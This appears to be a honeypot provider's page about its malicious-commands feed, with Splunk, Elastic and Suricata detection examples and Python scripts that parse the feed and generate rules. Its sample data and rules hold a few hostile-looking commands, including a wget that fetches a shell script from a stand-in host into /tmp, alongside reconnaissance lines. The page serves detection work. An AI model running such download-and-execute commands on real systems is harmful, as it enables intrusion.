
⚡ Malicious Commands Feed

Real commands and payloads executed by attackers on our honeypots. Valuable for understanding attack patterns, building detection rules, and security research.

⚠️ Warning: These commands are malicious. Do not execute them on production systems. Use only for research and detection rule development.

Command Feed

All captured malicious commands

commands.txt
Complete command feed

How to Use Command Feeds

Create SIEM Detection Rules:

# Splunk Detection
# The subsearch expands to (command="..." OR command="..."), so the lookup column
# name must match the field the bash_history sourcetype extracts.
index=linux sourcetype=bash_history
[| inputlookup checkthesum_commands.csv | fields command]

# Elastic SIEM
# A terms lookup reads the list of values from one document ("id") in the lookup
# index, field "path". <lookup-doc-id> is a placeholder for that document's id;
# "command" is the assumed field name holding the command list.
GET /logs/_search
{
  "query": {
    "terms": {
      "process.command_line": {
        "index": "checkthesum-commands",
        "id": "<lookup-doc-id>",
        "path": "command"
      }
    }
  }
}

Analyze Attack Patterns:

#!/usr/bin/env python3
import requests
from collections import Counter

# Download commands (fail loudly on HTTP errors instead of analysing an error page)
response = requests.get('https://www.check-the-sum.fr/feeds/commands/commands.txt', timeout=30)
response.raise_for_status()
commands = response.text.strip().split('\n')

# Analyze patterns: the first token of each line is the program the attacker invoked
first_words = [cmd.split()[0] if cmd.split() else '' for cmd in commands]
common_commands = Counter(first_words).most_common(10)

print("Top 10 most common attack commands:")
for cmd, count in common_commands:
    print(f"{cmd}: {count} times")
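The SIEM section above references a lookup file (checkthesum_commands.csv) that the feed does not ship, and exact-match rules only work if the feed lines and the log lines are normalized the same way. The following added example (written for this page, not code from check-the-sum.fr) builds that single-column lookup CSV from the feed text and then runs the same normalized matching over a handful of constructed bash_history lines, so the detection logic can be tested offline before it is loaded into a SIEM. The feed content and log lines below are constructed stand-ins; the real feed is the commands.txt URL on this page.

```python
#!/usr/bin/env python3
"""Build a Splunk-style lookup CSV from the commands feed and test log lines
against it. Added example; SAMPLE_FEED and SAMPLE_LOGS are constructed."""
import csv
import io
import re

# Constructed stand-in for commands.txt (duplicates and blank lines on purpose).
SAMPLE_FEED = """\
uname -a
cat /proc/cpuinfo | grep name
wget http://example.invalid/x.sh -O /tmp/x.sh

uname -a
"""

# Constructed bash_history lines: two benign, two matching the feed
# (one with irregular spacing to show why normalization matters).
SAMPLE_LOGS = [
    "ls -la",
    "uname -a",
    "  wget http://example.invalid/x.sh   -O /tmp/x.sh",
    "git status",
]


def normalize(cmd: str) -> str:
    """Collapse runs of whitespace and strip, so spacing variants still match."""
    return re.sub(r"\s+", " ", cmd).strip()


def parse_feed(text: str) -> list:
    """Return the unique, normalized, non-empty feed commands in feed order."""
    seen = set()
    commands = []
    for line in text.splitlines():
        cmd = normalize(line)
        if cmd and cmd not in seen:
            seen.add(cmd)
            commands.append(cmd)
    return commands


def to_lookup_csv(commands: list) -> str:
    """Render a one-column CSV (header 'command') suitable for inputlookup."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["command"])
    for cmd in commands:
        writer.writerow([cmd])
    return buf.getvalue()


def match_logs(commands: list, log_lines: list) -> list:
    """Return (line_index, feed_command) for every log line that exactly
    matches a feed command after normalization."""
    index = set(commands)
    hits = []
    for i, line in enumerate(log_lines):
        cmd = normalize(line)
        if cmd in index:
            hits.append((i, cmd))
    return hits


if __name__ == "__main__":
    cmds = parse_feed(SAMPLE_FEED)
    print(to_lookup_csv(cmds))
    for i, cmd in match_logs(cmds, SAMPLE_LOGS):
        print(f"log line {i}: matches feed command {cmd!r}")
```

Exact matching gives high precision but no recall against small variations, and generic reconnaissance commands such as uname -a are also run by legitimate administrators, so a lookup built this way still needs tuning (an allowlist of expected users or hosts, or a minimum command length) before it becomes an alerting rule.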

Generate Suricata Rules:

# Example Suricata rule for malicious commands
# Note: a content match only sees cleartext payloads. On port 22 the SSH session
# is encrypted after the key exchange, so this pattern can fire only on cleartext
# protocols (for example telnet or HTTP honeypot traffic); adjust the port to fit
# the protocol you actually inspect.
alert tcp any any -> any 22 (
  msg:"Malicious SSH command detected";
  content:"wget http"; nocase;
  flow:to_server,established;
  classtype:trojan-activity;
  sid:1000001;
  rev:1;
)
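Turning a whole feed into rules by hand does not scale, and feed commands routinely contain characters (`;`, `"`, `\`, `|`) that are special inside a Suricata content keyword. The following added example (written for this page, not code from check-the-sum.fr or the Suricata project) generates one rule per feed command: it hex-encodes every byte that is not safe as a literal using Suricata's |XX| notation, sanitizes the msg text, assigns sequential sids from a base, and skips very short commands that would be too noisy. Because content matching requires cleartext, the default port is 23 (telnet) rather than the SSH port used in the rule above; the port, the base sid and the minimum length are assumptions you should adapt, and SAMPLE_FEED is a constructed stand-in for the real feed.

```python
#!/usr/bin/env python3
"""Generate Suricata rules from a command feed. Added example; SAMPLE_FEED,
the default port (23, a cleartext protocol) and the sid range are assumptions."""
import re
from typing import List, Optional

# Constructed stand-in for commands.txt.
SAMPLE_FEED = """\
uname -a
cat /proc/cpuinfo | grep name
wget http://example.invalid/x.sh -O /tmp/x.sh
"""

# Characters allowed to stay literal inside content:"..."; everything else
# (including ; " \ | and non-ASCII) is emitted as |XX| hex bytes.
SAFE = re.compile(r"[A-Za-z0-9 _./:=+@,~-]")


def suricata_content(cmd: str) -> str:
    """Encode a command for a Suricata content keyword. Adjacent unsafe bytes
    are merged into a single |XX XX| group."""
    parts: List[str] = []
    hexrun: List[str] = []

    def flush() -> None:
        if hexrun:
            parts.append("|" + " ".join(hexrun) + "|")
            hexrun.clear()

    for ch in cmd:
        raw = ch.encode("utf-8")
        if len(raw) == 1 and SAFE.match(ch):
            flush()
            parts.append(ch)
        else:
            hexrun.extend(f"{b:02X}" for b in raw)
    flush()
    return "".join(parts)


def make_rule(cmd: str, sid: int, port: int = 23, min_len: int = 10) -> Optional[str]:
    """Build one rule, or return None if the command is too short to be a
    useful (low-noise) signature."""
    if len(cmd) < min_len:
        return None
    # msg must not contain ; or " either; replace them and keep it short.
    msg = re.sub(r'[";\\|]', " ", cmd)[:60]
    return (
        f"alert tcp any any -> any {port} ("
        f'msg:"Honeypot feed command: {msg}"; '
        f"flow:to_server,established; "
        f'content:"{suricata_content(cmd)}"; nocase; '
        f"classtype:trojan-activity; sid:{sid}; rev:1;)"
    )


def generate_rules(feed_text: str, base_sid: int = 1000001, port: int = 23) -> List[str]:
    """One rule per unique feed command, with sequential sids starting at base_sid."""
    rules: List[str] = []
    seen = set()
    sid = base_sid
    for line in feed_text.splitlines():
        cmd = line.strip()
        if not cmd or cmd in seen:
            continue
        seen.add(cmd)
        rule = make_rule(cmd, sid, port)
        if rule is not None:
            rules.append(rule)
            sid += 1
    return rules


if __name__ == "__main__":
    for rule in generate_rules(SAMPLE_FEED):
        print(rule)
```

The hex encoding is the important part: a feed line such as `cat /proc/cpuinfo | grep name` would otherwise be read by Suricata as the start of a hex group at the pipe, and a line containing a semicolon would terminate the keyword early and produce a rule that fails to load or matches something else than intended.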